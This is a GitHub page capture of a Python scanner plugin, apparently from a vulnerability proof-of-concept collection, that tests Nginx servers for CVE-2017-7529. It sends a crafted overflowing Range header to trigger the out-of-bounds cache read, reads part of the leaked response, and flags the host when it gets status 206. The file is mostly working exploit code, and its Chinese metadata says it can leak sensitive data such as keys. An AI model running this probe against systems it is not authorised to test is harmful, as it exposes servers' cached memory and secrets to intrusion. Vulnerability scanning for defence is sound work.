forked from muYoz/xunfeng_vul_poc
-
Notifications
You must be signed in to change notification settings - Fork 0
/
NginxCVE-2017-7529.py
42 lines (35 loc) · 1.07 KB
/
NginxCVE-2017-7529.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# -*- coding: utf-8 -*-
import requests
from termcolor import cprint
import HTMLParser
import urlparse
import urllib2
import re
def get_plugin_info():
plugin_info = {
"name": "Nginx信息泄露",
"info": "Nginx泄露敏感信息有KEY等:NginxCVE-2017-7529",
"level": "中危",
"type": "信息泄露",
"author": "muYoz@bg",
"url": "",
"keyword": "tag:nginx",
"source": 1
}
return plugin_info
def check(ip, port, timeout):
url_list = 'http://' + ip + ":" + str(port) + "/"
try:
a = requests.get(url_list)
start = int(a.headers['Content-Length']) + 300
end = 0x8000000000000000 - start
headers = {
"Range": "bytes=-{},-{}".format(start, end)
}
res = requests.get(url=url_list, headers=headers, stream=True, timeout=10)
ret = res.raw.read(500)
code = res.status_code
if code == 206:
return u"Nginx越界读取缓存漏洞(CVE-2017-7529)漏洞"
except:
pass